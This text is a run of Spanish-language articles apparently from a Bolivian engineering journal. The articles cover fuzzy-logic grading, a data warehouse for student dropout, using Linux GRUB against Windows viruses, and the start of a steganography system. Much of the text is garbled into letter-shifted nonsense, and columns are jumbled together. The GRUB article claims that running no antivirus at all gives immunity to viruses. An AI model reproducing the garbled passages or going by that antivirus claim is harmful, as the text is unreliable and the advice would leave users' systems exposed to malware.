mediante la lógica de predicados, que permite representar propiedades y/o relaciones, además puede manejar lo concreto y lo general (variables), es decir, tiene un mayor poder expresivo que la lógica proposicional. Formalizando Todos los estudiantes(as) que estudian aprueban con nota excelente P A R A D I G M A 43 P A £LZLZ[\KPHU[LHX\LLZ[\KPH ,U[VUJLZ£HWY\LIHJVUUV[HL_JLSLU[L c: estudiantes(as) que estudian a: aprueban con nota excelente Y!£LZLZ[\KPHU[LHX\LLZ[\KPH Z!£HWY\LIHJVUUV[HL_JLSLU[L Propiedades A D I G M A 44 donde A(x) se denomina función característica. :LHUKVZJVUQ\U[VZ(`)KVUKL( )(ZLW\Lde representar con los elementos de B utilizando la función A(x): A = {ai } B = {bi} ó ($bHPIP d A = {ai , bi } B = {bi , ci } ó ($bHPIP JP d N : estudian H : nota excelente Sujeto: estudiante(a) (variable) :\QL[V!£JVUJYL[V R (_$b _ ('_ ( 7! _5_ H(x)) Pero pueden existir elementos de B que pueden pertenecer un poco a A, estar muy cercano a A, etc. Matemáticamente se puede expresar como subconjunto borroso: 7!5£ *!/£ Sea la sentencia del anterior razonamiento B _5_ /_ 5£ /£D ( $bHP HP d 9LHSPaHTVZSHPU[LYWYL[HJP}UWHYHLSLZ[\KPHU[LH£ Es decir se extiende la pertenencia a valores intermedios de 0 y 1. 5£ /£ P1 P2 C i1 F F V F F V V i2 F V V F V F V i3 V F F V F F V b_ ( _d _ ) i4 V V V V V V V KVUKL)LZ\UJVUQ\U[VLU\TLYHISLVUV`( _ LZLSNYHKVKLTLTIYLZxHKL_LU V[HTIPtUSSHmado función característica de membresía. 7 7 7 7 * :L W\LKL KLK\JPY X\L LS LZ[\KPHU[L £ HWY\LIH JVU nota excelente por la tautología de las interpretaciones. Pero si bien la lógica de predicados resuelve los problemas de manera general y los casos particulares, pero su interpretación y su semántica es binaria, por lo cual el estudiante que estudia no necesariamente aprueba con nota excelente. Interpretación Difusa La interpretación de la lógica difusa se basa en posibilidades del rango de [0,1] en los subconjuntos borrosos representados por el conjunto: Según Zadeh un subconjunto borroso A de B se KLÄULJVTV\UJVUQ\U[VKLWHYLZVYKLUHKVZ! ( [VTHZ\Z]HSVYLZLU\UJVUQ\U[VKLTLTIYLZxH M. *HSPÄJHJPVULZ :LHSHZPN\PLU[LLZJHSHKLJHSPÄJHJPVULZ A excelente 90 – 100 B muy bueno 80 – 89 C bueno 60 – 79 M = {0, 0.1, ...,1} Denominados conjunto de membresía. Con la lógica de predicados, se indico que todos los estudiantes que estudian aprueban con nota excelente y la pregunta es cuan excelente son estos estudiantes? Para indicar que un elemento a es miembro del conjunto A se simboliza como: Por ejemplo; los siguientes estudiantes tienen las ZPN\PLU[LZJHSPÄJHJPVULZ! H ( También esta membresía se puede simbolizar con los valores de 0 y 1 como pertenencia y no pertenencia respectivamente: O = 90 P = 93 Q = 98 R = 100 El grado de membresía es 1 porque todos son excelentes. Se realiza dos consideraciones: la nota mínima del curso es 80% la nota mínima del curso es 85% Para 80%: B = {80, 81,..., 100} M = {0, 0.15, 0.3, 0.50, 0.65, 0.90, 1} ( $ b (93,0.65), (98,0.90), (100,1)} ( _$_¶ _$ ( $ _$ ( $ Según el análisis con una nota media de 80 el estudiante que obtiene la nota de 83 es excelente con una posibilidad de 15% Para 85%: B = {85, 86, 87,..., 100} M = {0, 0.33, 0.53, 0.86, 1} ( $ b 0.86), (100,1)} Con una nota mínima de 85, el estudiante que obtiene 80 es considerado excelente con una posibilidad de 6%. Para la toma de decisiones es fundamental hacer un análisis de las notas altas respecto a su mínimo. El estudiante que obtuvo una nota de 93 es excelente con una posibilidad de 65% en el primer caso y mientras que en el segundo caso solamente es excelente con una posibilidad de 53%. Según lo analizado se ve la necesidad de almacenar la información del estudiante que obtuvo la nota excelente con ambas posibilidades, para lo cual es necesario un medio de almacenamiento que permita el manejo de dicha información para una buena toma de decisiones. Las Bases de Datos tradicionales son muy limitadas, no permiten ni almacenar ni tratar con datos difusos, pero para el almacenaTPLU[V KL JHSPÄJHJPVULZ KPM\ZHZ LZ PTWYLZJPUKPble esta forma de almacenamiento para una mejor toma de decisiones. Las bases de datos relacionales difusas permiten el manejo de información difusa, considerando las etiquetas lingüísticas sobre un dominio X (excelente) para un determinado atributo A (93 o 65), cuya distribución de posibilidad de X\LLSH[YPI\[V[VTLLS]HSVY_ ?LZ(_ CONCLUSIONES Se puede decir que los resultados de la interpretación difusa depende de los parámetros que se utiliza para el análisis respectivo, en el ejemplo en particular se utiliza una interpretación lineal pero puede existir en algunas materias con notas atípicas, notas dispersas, etc. Que deben utilizar un modelo de acuerdo a cada comportamiento (triangular, exponencial, etc). P A 3VZ YLZ\S[HKVZ KLS HUmSPZPZ KL SHZ JHSPÄJHJPVULZ cuando son cualitativos son difusas, a pesar de tener una escala cuantitativa, ya que en el ejemplo se demostró que un estudiante que obtuvo la nota de 86 que no esta en la escala de excelente también es considerado como estudiante excelente con una posibilidad de 30% y 6% respectivamente. R ,SHSTHJLUHTPLU[VTHUPW\SHJP}U`JVUZ\S[HÅL_PISLLZ necesario para coadyuvar en el mejor análisis e interpretación de las notas obtenidas por los estudiantes. A Dudas Sea las siguientes notas obtenidas en la evaluación de dos materias X, Y. Estudiantes Materia X/nota O 51 máximo P 50 Q 49 mínimo Estudiantes Materia Y/nota O 65 máximo P 60 Q 58 R 50 mínimo D I G ¿El estudiante O es excelente? ¿El estudiante P de la materia X debe reprobar? Bibliografía +H[LBase de Datos. McGraw Hill-España. -LYUmUKLa Fundamentos de Informática. Alianza editorial – Madrid /PSLYH14HY[xULa=Redes Neuronales (Y[PÄJPHSLZ Addison Wesley U.S.A. 4HY[xU KLS )YxV ) Redes Neuronales y sistemas difusos, México 5PSZZVU50U[LSPNLUJPHHY[PÄJPHS, McGraw Hill-España. M A 45 MODELO DATAWAREHOUSE PARA LA TOMA DE DECISIONES EN LA REDUCCIÓN DE LA TASA DE ABANDONO DE ESTUDIANTES P A R A D I G M A 46 Daniel Julio Poppe Villa Romero Departamento de Ingeniería de Sistemas – Escuela Militar de Ingeniería Irpavi (La Paz) Bolivia Email: [email protected] – [email protected] RESUMEN En este trabajo se presenta el desarrollo e implementación de un modelo Datawarehouse para la toma de decisiones en la reducción de la tasa de abandono de estudiantes, tomando un caso de estudio a la Universidad Doxa Bolivia. El modelo presentado es libre de parámetros y utiliza procesos LZWLJxÄJVZWHYHNLULYHYHSLY[HZ[LTWYHUHZYLZWLJto a los estudiantes, realizando la toma decisiones de manera oportuna de acuerdo a la información obtenida. En el artículo se resumen el Datawarehouse, la metodología de desarrollo de un Datawarehouse, herramienta utilizada para el desarrollo, tasa de abandono y las limitaciones del modelo. que permitan automatizar las áreas de una organización y de esta manera lograr el cumplimiento de Z\Z VIQL[P]VZ JVU LS ÄU KL ZLY TmZ JVTWL[P[P]HZ LÄJPLU[LZ`LÄJHJLZ Uno de estos avances tecnológicos es el Datawarehouse el cual llega a cumplir un papel muy importante dentro de cada una de las empresas y a la vez H\TLU[H SH JVUÄHUaH WHYH SH [VTH KL KLJPZPVULZ para que de esta manera se facilite el trabajo, y a si de esta manera agilizar el trabajo de las empresas, brindando la ayuda necesaria para minimizar el tiempo de análisis de la información con mayor velocidad y precisión. PROBLEMÁTICA ABSTRACT In this work, one presents development and implementationand of a data warehouse model for decision making in reducing the dropout rate of students taking a case study at the University Doxa Bolivia. The model presented is free of parame[LYZ HUK ZWLJPÄJ WYVJLZZLZ \ZLK [V NLULYH[L LHYly warnings regarding students, performing timely decisions based on the information obtained. The article summarizes the data warehouse, the methodology of developing a data warehouse, tool used for development, dropout rate and the limitations of the model. PALABRAS CLAVE Datawarehouse, Metadatos, SQL, Data Manipula[PVU3HUN\HNL+H[H+LÄUP[PVU3HUN\HNL;VTHKL Decisiones, Tasa de Abandono. INTRODUCCIÓN En la actualidad se puede observar que a nivel mundial existe una gran necesidad de contar con tecnologías adecuadas para realizar diferentes procesos La detección de alguna necesidad y que a la vez no pueda ser satisfecha por el tipo de sistemas transaccionales y de gestión que existe y que está funcionando de acuerdo a las expectativas de la Universidad Doxa Bolivia. Se pudo detectar que existe un factor de mucho interés e importancia que es el de tener alguna forma de poder detectar estudiantes insatisfechos o estudiantes que por motivos académicos, económicos o personales; deciden ABANDONAR la Universidad y que en muchos casos podían haber sido tratados a tiempo y otros solucionados, para lo cual se hara el desarrollo de un modelo Datawarehouse, siguiendo la Metodología propuesta por el INEI (Instituto Nacional de Estadística e Informática – Perú) para el desarrollo de un Datawarehouse. OBJETIVO En este artículo se propone un modelo Datawarehouse el cual permita tomar decisiones referido a LZ[\KPHU[LZ X\L WYLZLU[LU KPÄJ\S[HKLZ HJHKtTPcas, personales y económicas con la institución, para reducir los porcentajes de la tasa de abandono de estudiantes. Se desea que la aplicación realice la elaboración de alertas tempranas la realización de un seguimiento personalizado a los estudiantes para determinar factores de riesgo, como el bajo rendimiento académico determinado por las notas, la mora por compromisos económicos y la falta de cumplimiento en la presentación de documentos requisitos para cursar una carrera universitaria. La estructura de este trabajo se describe a continuación: inicialmente se muestra un concepto sobre el Datawarehouse y el SQL seguidamente de la TL[VKVSVNxH WSHU[LHKH WVY LS 05,0 ` WHYH ÄUHSPaHY con conclusiones y recomendaciones para trabajos futuros a partir de los resultados obtenidos. DATAWAREHOUSE ,_PZ[LU KP]LYZHZ KLÄUPJPVULZ KL +H[H^HYLOV\ZL ZPU LTIHYNV SH KLÄUPJP}U TmZ JVUVJPKH WHYH LS Datawarehouse, fue propuesta en 1992 por Inmon: “Un DW es una colección de datos orientados a temas, integrados, no-volátiles y variante en el tiempo, organizados para soportar necesidades empresariales” [INMON, 1992] Al Datawarehouse también se le puede llamar Bussines Intelligence o Decision Support. En la Figura 1, podemos ver la representación gráÄJHKLSVX\LLZ\U+H[H^HYLOV\ZL house el metadato juega un papel fundamental, su M\UJP}UJVUZPZ[LLUYLJVNLY[VKHZSHZKLÄUPJPVULZ de la organización y el concepto de los datos en el almacén de datos, debe contener toda la información concerniente a: P Tablas A Columnas de tablas Relaciones entre tablas Jerarquías y Dimensiones de datos Entidades y Relaciones [HERNANDEZ, 2010] SQL Es un lenguaje de consulta estructurado para el acceso a base de datos relacionales. Por tanto el SQL nos brinda la posibilidad de realizar consultas con el objetivo de recuperar información de las bases de datos de manera sencilla. También es utilizado para crear y manipular directamente las bases de datos y crear consultas SQL. 3HZZLU[LUJPHZ:83ZLJSHZPÄJHUZLNUZ\ÄUHSPKHK dando origen a tres ‘lenguajes’ o sublenguajes: El ++3 +H[H +LÄUP[PVU 3HUN\HNL SLUN\HQL KL KLÄUPJP}U KL KH[VZ PUJS\`L }YKLULZ WHYH KLÄUPY TVKPÄJHYVIVYYHYSHZ[HISHZLUSHZX\LZLHSTHJLUHU los datos; el DCL (Data Control Language), lenguaje de control de datos, contiene elementos útiles para trabajar en un entorno multiusuario, en el que es importante la protección de los datos, la seguridad de las tablas y el establecimiento de restricciones en el acceso; el DML (Data Manipulation Language), lenguaje de manipulación de datos, nos permite recuperar los datos almacenados en la base de datos y permite al usuario actualizar la base de datos añadiendo nuevos datos, suprimiendo datos antiguos o TVKPÄJHUKVKH[VZWYL]PHTLU[LHSTHJLUHKVZ METODOLOGÍA DE ELABORACIÓN DE UN DATAWAREHOUSE Figura 1: Datawarehouse Uno de los componentes más importantes de la arquitectura de un almacén de datos son los metaKH[VZ:LKLÄULJVTUTLU[LJVTV¸KH[VZHJLYJH de los datos”, en el sentido de que se trata de datos que describen cuál es la estructura de los datos que se van a almacenar y cómo se relacionan. El metadato documenta, entre otras cosas, qué tablas existen en una base de datos, qué columnas posee cada una de las tablas y qué tipo de datos se pueden almacenar. En el ámbito de los Dataware- Fase 1: Organización Se debe tener en consideración los factores para la WSHUPÄJHJP}USHZLZ[YH[LNPHZKLKLZHYYVSSVKLKPZLño y de gestión del Datawarehouse. De esta manera entonces primero debe realizarse el análisis del sistema actual de la institución donde se va a desarrollar el proyecto, caracterizando los diferentes procesos en diagramas de casos de uso, donde se podrá detallar cada una de las tareas que tienen los diversos módulos del sistema actual. 3\LNVKLZLKLILOHJLYSHPKLU[PÄJHJP}UKLSHM\LUte donde la institución cuenta con un servidor de R A D I G M A 47 P A R A D I G M Base de Datos donde se encuentra almacenado toda la información de la institución. Después se KLILPKLU[PÄJHYU\LZ[YHZOLYYHTPLU[HZH\[PSPaHY"SH herramienta para la extracción de datos utilizada fue “Microsoft SQL Server 2000 Developer”, el cual nos proporciona un mejor ambiente de trabajo y así mismo se trabajara directamente con archivos de respaldo de la base de datos de la institución; la herramienta para la transformación y limpieza de los datos es propia del programa de SQL Server este posee una herramienta integrada que es el DTS (Data Transformation Services), el cual nos permite realizar una transformación y carga de los datos de una manera más rápida y limpia al Datawarehouse; la herramienta para la creación de los cubos se utilizara la herramienta “Bussines Intelligence” la cual tiene compatibilidad con la herramienta SQL Server, agilizando de esta manera el proceso de la creación de los nuevos cubos. de Datos y principalmente se debe tomar en cuenta [HTIPtUSHJVUÄHIPSPKHKKLSVZKH[VZ Sobre todo es la construcción propia del ETL para la extracción, transformación y limpieza de los datos donde gracias a estos se crea la nueva base de datos del Datawarehouse, con datos pre-analizados, para facilitar de esta manera la construcción de los cubos. Luego de haber realizado todos los procedimientos de extracción con el ETL se procede a crear los cubos, con esto se puede hacer relacion de las diferentes tablas de la nueva base de datos creada para el Datawarehouse, formando de esta manera un cubo con diferentes dimensiones y atributos, como se muestra en la Figura 2. Finalmente se pasa a realizar el análisis de todos los requerimientos que presenta la empresa, estos requerimientos principales se encuentran en la Tabla 1. Requisito Requerimientos R1 Extracción de la información pre analizados según las bases de datos. R2 Desarrollar un Datawarehouse para la Universidad Doxa Bolivia. R3 Almacenamiento de los datos extraídos y pre analizados al Datawarehouse. Figura 2: Cubos R4 Crear procedimientos almacénanos ETL de mantenimiento de actualización diaria de la Base de Datos del Datawarehouse. R5 Elaborar reportes que presenten los datos procesados y ayude a la toma de decisiones. Para lograr esta relación primero debe crearse en la herramienta Bussines Intelligence un modelo relacional el cual puede utilizar un esquema estrella VJVWVKLUPL]LKVUKLZLWVKYmPKLU[PÄJHYSHZKPmensiones como se muestra en la Figura 3. R6 El modelo Datawarehouse presentaYH SH PUMVYTHJP}U TLKPHU[L NYmÄJHZ para su mejor visualización e interpretación del mismo hacia el usuario. Tabla 1: Requerimientos A 48 Fase 2: Desarrollo Se debe tomar en cuenta el alcance del modelo, la YLK\UKHUJPHKLKH[VZ`LS[PWVKL\Z\HYPVÄUHSSVZ elementos claves para el desarrollo del modelo es decir la Arquitectura total del depósito, la Arquitectura del servidor y el Sistemas de Gestión de Base Figura 3: Modelo Relacional (esquema estrella) Luego se crea las dimensiones que se tiene en el modelo relacional con sus diferentes atributos los cuales serán de utilidad al momento en que se haga Z\ YLWYLZLU[HJP}U NYmÄJH KLS TPZTV KLIPKV X\L estos desplegaran la información, y los datos estadísticos de acuerdo a lo que el usuario lo necesite. Esto se muestra en la Figura 4. JVZ[V`ILULÄJPVKLSTVKLSV Todos los costos realizados para el desarrollo del proyecto en su totalidad, de acuerdo a investigaJPVULZ IPISPVNYmÄJHZ ZVU HWYV_PTHKVZ ` YLZWVUden a las siguientes categorías: Inversión de Software. Inversión de Hardware. Capacitación. Costos de Desarrollo Inversión Indirecta Figura 4: Dimensión Finalmente se hace la construcción del cubo tomando en cuenta el modelo relacional creado y los atributos que se crearon, luego de se realiza el mismo procedimiento las veces que sean necesarias para nuestro Datawarehosue. Esto se muestra en la Figura 5. Si bien uno de los propósitos de cualquier sistema es remplazar al ser humano, la presente propuesta busca apoyar al ser humano y de responder en el menor tiempo posible ante cualquier eventualidad inesperada. 7VYSV[HU[VLULZ[LZLU[PKVSVZILULÄJPVZX\LNLnera el sistema propuesto responden a las siguientes categorías: )LULÄJPVZ[HUNPISLZ )LULÄJPVZPU[HUNPISLZ CONCLUSIONES Figura 5: Cubo Fase 3: Implementación Las Estrategias en la Implementación son las siguientes: +LÄUPYLSTLQVYKPZL|VMxZPJVWHYHLSTVKLSV de datos. +LÄUPYSVZWYVJLZVZKLL_[YHJJP}UÄS[YV[YHUZformación de información y carga de datos. +LÄUPYSVZWYVJLZVZKLHKTPUPZ[YHJP}UKLSH información. +LÄUPYSHZMVYTHZKLJVUZ\S[HZHSHPUMVYTHción que se le proporcionará al usuario. 5° Completar el modelo de consulta base, relativo al área seleccionada. 6° Implementar los procesos estratégicos del área de trabajo. 7° Completar las áreas de interés, en forma similar a lo descrito anteriormente. Fase 4: Evaluación En esta fase se realiza la evaluación de rendimiento de la Inversión, es decir, se realiza las evaluaciones Se concluye que el Datawarehouse provee dos beULÄJPVZLTWYLZHYPHSLZYLHSLZ!0U[LNYHJP}U`(JJLZV de datos, es decir, que el Datawarehouse elimina una gran cantidad de datos inútiles y no deseados, como también el procesamiento desde el ambiente operacional clásico, además de ser un almacenamiento separado y homogéneo donde son cargados datos transformados provenientes de diferentes bases de datos, la cual se convierte en un colección integrada de información corporativa la cual está diseñada para la recuperación y también el análisis en apoyo a la toma de decisiones. REFERENCIAS BIBLIOGRÁFICAS (S[LY:3 +LJPZPVUZ\WWVY[Z`Z[LTZ!J\rrent practice and continuing challenges. Reading, Mass., Addison-Wesley Pub. /\NV 4LYJHKV 7HI}U Business Intelligence – Seminarios de Actualizacion, 2009. 0UZ[P[\[V 5HJPVUHS KL ,Z[HKxZ[PJH L 0UMVYTm[PJH Lima – Perú, 1997. 4HU\LSKLSH/LYYHU.HZ[}UQue es un Datawarehouse, 1993. 7YVM ,SSPV[ Manual para la Construcción de un Datawarehouse, 1997, Ed. INEI, Lima – Perú. 9\MV4HY[xU7LKYVTutorial SQL. >PSSPHT/0UTVU3H+LÄUPJP}UKL\U+H[H^HYLhouse, 1992. P A R A D I G M A 49 APLICACIÓN DE GRUB DE LINUX SOBRE WINDOWS (Vista, 7 y 8) PARA EVITAR CONTAGIO Y PROPAGACIÓN DE VIRUS, UTILIZANDO UN PARADIGMA DE CONTAGIO DE VIRUS DE INFLUENZA EN NIÑOS MENORES DE 2 AÑOS P A R A D I G M A 50 Diego Carlos Feraudy Pinto Departamento de Ingeniería de Sistemas – Escuela Militar de Ingeniería Irpavi (La Paz) Bolivia Email: [email protected] – [email protected] RESUMEN INTRODUCCIÓN En este trabajo se aplica la utilidad de la función de Grub de Linux que permitirá instalar una distribución de Linux sobre un sistema operativo preinstalado y funcionando (Wiindows), el cual evitará la ejecución de distintos tipos de archivos y programas maliciosos que se comportan como virus. ,SILULÄJPVKLLZ[HOLYYHTPLU[HYHKPJHYmLUZ\M\Ucionabilidad, independientemente de la presencia de un antivirus gratuito, con licencia, de prueba, legal o ilegal; ya que éste software ejecuta varios tipos de archivos al momento de realizar un escaneo parcial o total de todos los archivos que se encuentran dentro de una unidad física o una partición del disco duro, que sea indicada por defecto. En la actualidad se puede observar que hay un gran nivel de propagación de virus de virus por medio de dispositivos móviles y dispositivos extraíbles, esto se debe a que no utilizan bien el antivirus ni el problema de actualización del Windows defender otra herramienta para encontrar archivos maliciosos dentro del Windows, la ventaja de aplicar el Grub de Linux es adicionar una forma de examinar los datos que uno tiene en las diferentes particiones del disco es decir cuando la distribución de Linux reconoce el los datos dentro de la distribución encuentra varios tipos de archivos que no se ven dentro de Windows o los encuentra con diferentes formatos, la clave está en no utilizar un antivirus, el cual lo veremos más adelante. ABSTRACT PROBLEMÁTICA This paper applies the utility function of Linux Grub, that allow install a Linux distribution on preinstalled and running operating system (Wiindows), which prevents the execution of various types of malicious WYVNYHTZHUKÄSLZ[OH[ILOH]LSPRL]PY\ZLZ La gran propagación y mal uso de antivirus geneYHYHT\JOVZTmZWYVISLTHZKLJVUÄN\YHJP}U`KL ejecución de varios programas dentro de una maquina debido a la mala utilización del antivirus. OBJETIVO ;OL ILULÄ[ VM [OPZ [VVS ^PSS IL PU P[Z M\UJ[PVUHSP[` independently of the presence a free antivirus with license, try version, legal or illegal; because this sof[^HYL L_LJ\[LZ T\S[PWSL ÄSL [`WLZ ^OLU H WHY[PHS VYJVTWSL[LZJHUUPUNPZZ[HY[LKMYVT[OVZLÄSLZSVcated within a physical drive or hard disk partition, [OH[^PSSILZWLJPÄLKI`KLMH\S[ En este artículo se propone la aplicación de Grub de Linux para evitar que se ejecuten varios tipos de arJOP]VZTHSPJPVZVZWVYTLKPVZKLJVUÄN\YHJP}UWVY defecto de un antivirus para lo cual se empleara la aplicación sin necesidad de utilizar un antivirus solo aplicando la herramienta de Windows defender. PALABRAS CLAVE GRUB DE LINUX Grub, Linux, Virus, Paradigma, Propagación, Con[HNPV0UÅ\LUaH:JHU .5< .9<) .5< .YHUK <UPÄLK )VV[SVHKLY LZ un gestor de arranque múltiple, desarrollado por el proyecto GNU que se usa comúnmente para iniciar uno, dos o más sistemas operativos instalados en un mismo equipo. GRUB fue inicialmente diseñado e implementado por el programador Erich Stefan Boleyn como parte del trabajo en el arranque del sistema operativo GNU Hurd desarrollado por la Free Software Foundation. En 1999, Gordon Matzigkeit y Yoshinori Okuji convirtieron a GRUB en un paquete de sof[^HYLVÄJPHSKLS7YV`LJ[V.5<`HIYPLYVULSKLZHrrollo del mismo al público. El desarrollo de la versión más moderna, GRUB 2, se inició con el nombre de PUPA, hoy abandonado. El proyecto PUPA fue apoyado por la organización Information technology Promotion Agency (IPA) en Japón. PUPA se integró en el desarrollo de GRUB 2 alrededor del 2002, cuando la versión 0.9x de GRUB fue renombrada a GRUB Legacy. Desde febrero del año 2008, GRUB 2 todavía sigue en desarrollo, aunque está siendo usado en las más recientes versiones de distribuciones de GNU/Linux. gusanos, con los que el programa malicioso actúa replicándose a través de las redes. En cualquiera de los dos casos, el sistema operativo infectado comienza a sufrir una serie de comportamientos anómalos o no previstos. Dichos comportamientos son los que dan la traza del problema y tienen que permitir la recuperación del mismo. Dentro de las contaminaciones más frecuentes por interacción del usuario están las siguientes: 4LUZHQLZ X\L LQLJ\[HU H\[VTm[PJHTLU[L programas (como el programa de correo que abre directamente un archivo adjunto). 0UNLUPLYxH ZVJPHS TLUZHQLZ JVTV! ­,QLJ\[L este programa y gane un premio». ,U[YHKH KL PUMVYTHJP}U LU KPZJVZ KL V[YVZ usuarios infectados. 0UZ[HSHJP}UKLZVM[^HYLX\LW\LKHJVU[LULY uno o varios programas maliciosos. <UPKHKLZL_[YHxISLZKLHSTHJLUHTPLU[V<:) P A R A IMPLEMENTACIÓN DE GRUB Instalación del Grub D I ANTIVIRUS Grub ya funcionando G En informática los antivirus son programas cuyo objetivo es detectar y/o eliminar virus informáticos. Nacieron durante la década de1980. Con el transcurso del tiempo, la aparición de sistemas operativos más avanzados e Internet, ha hecho que los antivirus hayan evolucionado hacia programas más avanzados que no sólo buscan detectar virus informáticos, sino bloquearlos, desinfectar archivos y prevenir una infección de los mismos, y actualmente ya son capaces de reconocer otros tipos de malware, como spyware, gusanos, troyanos, rootkits, etc. MÉTODOS DE CONTAGIO Existen dos grandes grupos de propagación: los virus cuya instalación el usuario en un momento dado ejecuta o acepta de forma inadvertida, o los M Utilización dentro de Windows A 51 P A R A D “Es necesario tener siempre actualizada esta herramienta” PARADIGMA DE CONTAGIO DE VIRUS DE INFLUENZA EN NIÑOS MENORES DE 2 AÑOS Y FORMA DE EMPLEARLO Debido a que los niños de una edad inferior a los dos años cuyos receptores no se han desarrollado se presenta una función de inmunidad a los diferen[LZ[PWVZKL]PY\ZLULZ[LJHZVHSKL\UHPUÅ\LUaH común cuyas consecuencias en un niño muchas más grandes generarían un mal estar tremendo, la semejanza o paradigma que se emplea respecto a la funcionalidad de no utilizar algún antivirus dentro de una PC que funciona con Grub de Linux tiene el mismo principio ya que no se ejecuta la activación por defecto al ser detectado un virus o archivo THSPJPVZVWVYTLKPVKLSHJVUÄN\YHJP}UImZPJHKL un antivirus ya sea con licencia o sin licencia, es decir si no está activado un antivirus como puede ser detectado un virus simplemente se lo ve como un archivo mas pero no está activo si es que uno no lo ejecuta por lo que simplemente tendría que eliminarlo de la unidad donde se encuentra, esto tamIPtUUVZZPY]LWHYHSPTWPHYHSNUÅHZOTLTVY`X\L posea algún tipo de virus o que estén sus archivos ocultos una forma esencial de ver los archivos ocultos dentro de una unidad extraíble es en línea de comandos es utilizar dentro la unidad correspondiente (attrib –r –s –h /d /s) lo cual nos mostrara archivos que se hayan ocultado y por lo tanto solo hay que eliminar los tipos de archivos que nosotros desconozcamos. CONCLUSIONES Se concluye que la efectividad se debe a una especie de inmunidad de virus solo por no tener un medio que ejecute simultáneamente un scan a los diferentes discos por lo tanto que es necesario no tener ni un antivirus instalado si se utiliza Grub de Linux para evitar que se eliminen archivos por defecto. REFERENCIAS BIBLIOGRÁFICAS 5HJOV *HIHULa Introducción a virus y antivirus. (UKYL^:;HULUIH\T:PZ[LTHZ6WLYHtivos 5LSZVUTratado I G M A 52 Representante de la carrera en la competencia nacional de programación - ACM SISTEMA DE ESTEGANOGRAFÍA BASADO EN IMÁGENES PARA EL ENVIO Y RECEPCIÓN DE INFORMACIÓN RESERVADA López Quiroga Rubén Cristhian Avenida General Lanza 2129 Sopocachi – La Paz Bolivia Telf: 2422321 E-mail: [email protected] Escuela Militar de Ingeniería Irpavi – La Paz Bolivia RESUMEN El presente artículo expone el desarrollo de un sis[LTH LZ[LNHUVNYmÄJV WHYH THU[LULY ZLN\YH PUformación reservada que es enviada y recibida por la organización. El sistema presentado hace uso KLS Tt[VKV LZ[LNHUVNYmÄJV IP[ TLUVZ ZPNUPÄJH[Pvo aplicado en imágenes bmp para ocultar la información reservada y para incrementar el nivel de ZLN\YPKHK[HU[VLUSHJVUÄKLUJPHSPKHKJVTVLUSH PU[LNYPKHKZLHWSPJHUTt[VKVZJYPW[VNYmÄJVZZPTttricos y asimétricos. En el artículo se resumen las metodologías para el desarrollo del sistema propuesto. ABSTRACT This paper presents the development of a system [VTHPU[HPUZLJ\YLZ[LNHUVNYHWOPJJVUÄKLU[PHSPUformation that is sent and received by the organization. The system presented uses the LSB stegaUVNYHWOPJTL[OVKHWWSPLKITW[VOPKLJVUÄKLU[PHS information and to increase the security level in both [OLJVUÄKLU[PHSP[`HUK[OLPU[LNYP[`HWWS`Z`TTL[YPJ and asymmetric cryptographic methods. The article summarizes the methods for developing the proposed system. PALABRAS CLAVE Esteganografía, criptografía, imágenes bmp, inteNYPKHKJVUÄKLUJPHSPKHKUVYTHZKLZLN\YPKHK A R nivel de seguridad sería mayor, por lo tanto, la utilización de un mecanismo portador del mensaje original que pueda ser transmitida sin levantar sospecha sobre la importancia de su recepción es ideal WHYHNHYHU[PaHYSHJVUÄKLUJPHSPKHKLPU[LNYPKHKKL la información reservada. Para transmitir información de manera segura, se ha desarrollado la esteganografía digital, consiste en ocultar un mensaje en una imagen, archivo de video, audio, datos u otros, que no levante sospechas y oculte la información secreta dentro de él. El trabajo presentado propone un método para ocultar información en un objeto que a simple vista no detecte sospechas de lo que contiene y métodos para mantener segura información sensible al momento de enviarla y recibirla asegurando su in[LNYPKHK`JVUÄKLUJPHSPKHK A D I PROBLEMÁTICA Los métodos de seguridad empleados para manteULYSHJVUÄKLUJPHSPKHKLPU[LNYPKHKKLSHPUMVYTHJP}U en varias organizaciones se encuentran desactualizadas, emplean equipos antiguos o métodos de cifrado clásicos que a pesar de combinar varios métodos JYPW[VNYmÄJVZ ZVU JVUVJPKVZ ` MmJPSLZ KL YVTWLY Existe una susceptibilidad en el manejo de software para mantener la información reservada y más aún de utilizar la Internet para enviar y recibir información sin ser propensos a diversos ataques cibernéticos. OBJETIVOS INTRODUCCIÓN Mantener segura la información durante el proceso de comunicación es de suma importancia para cualquier organización, sobre todo para aquellas que manejan información reservada. Si la información fuera transmitida de manera imperceptible el P El presente artículo está destinado a exponer el proceso de construcción de un sistema de esteganografía que oculte mensajes de texto cifrados en PTmNLULZWHYHSHWYV[LJJP}UKLSHJVUÄKLUJPHSPKHK e integridad de la información reservada enviada y recibida. G M A 53 P A R A D I G M A 54 Para cumplir con el objetivo anteriormente expresado, se deben llevar a cabo los siguientes objetivos LZWLJxÄJVZ! (WSPJHY\UHTL[VKVSVNxH`[tJUPJHKLLZ[LNHnografía para el cifrado de datos en imágenes. +L[LYTPUHY LS LX\PWHTPLU[V HKLJ\HKV WHYH la utilización correcta de la aplicación. ,TWSLHY HSNVYP[TVZ KL LUJYPW[HJP}U WHYH LS desarrollo del sistema. +LÄUPYJYP[LYPVZX\LWLYTP[HULZ[HISLJLYWHrámetros comparativos en relación con la esteganografía como solución para la protección segura de datos para disminuir el nivel de riesgo de interceptación. NORMAS INTERNACIONALES DE SEGURIDAD Las organizaciones necesitan demostrar que realizan una gestión competente y efectiva de la seguridad de los recursos y datos que gestionan por lo tanto necesitan de normas que deben cumplir. La familia de la ISO 27000 trata de un conjunto de UVYTHZX\LLZWLJPÄJHUSVZYLX\PZP[VZWHYHLZ[HISLJLY implantar, poner en funcionamiento, controlar, revisar, mantener y mejorar la seguridad de la información. 3H0:60,*LZWLJPÄJHSVZYLX\PZP[VZHJ\Tplir para implantar un Sistema de gestión de seguriKHKKLSHPUMVYTHJP}U:.:0JLY[PÄJHISLJVUMVYTL a las normas 27000. vada, es usada por el propietario para encriptar los mensajes, mientras que la otra, llamada clave pública, es usada para desencriptar el mensaje. TÉCNICAS DE ESTEGANOGRAFIA Esteganografía es la disciplina en que se estudian y aplican técnicas que permiten ocultar cualquier información dentro de un objeto portador evitando que personas no autorizadas conozcan la existencia de la información. De acuerdo a los distintos objetos portadores, ya sean imágenes, audio, video, texto u otros, existen \UH NYHU JHU[PKHK KL Tt[VKVZ LZ[LNHUVNYHÄJVZ Si se trabaja con imágenes, el método tradicional JVUZPZ[L LU Z\Z[P[\PY SVZ IP[Z TLUVZ ZPNUPÄJH[P]VZ (LSB), en una escala de color de 24 bits (más de 16 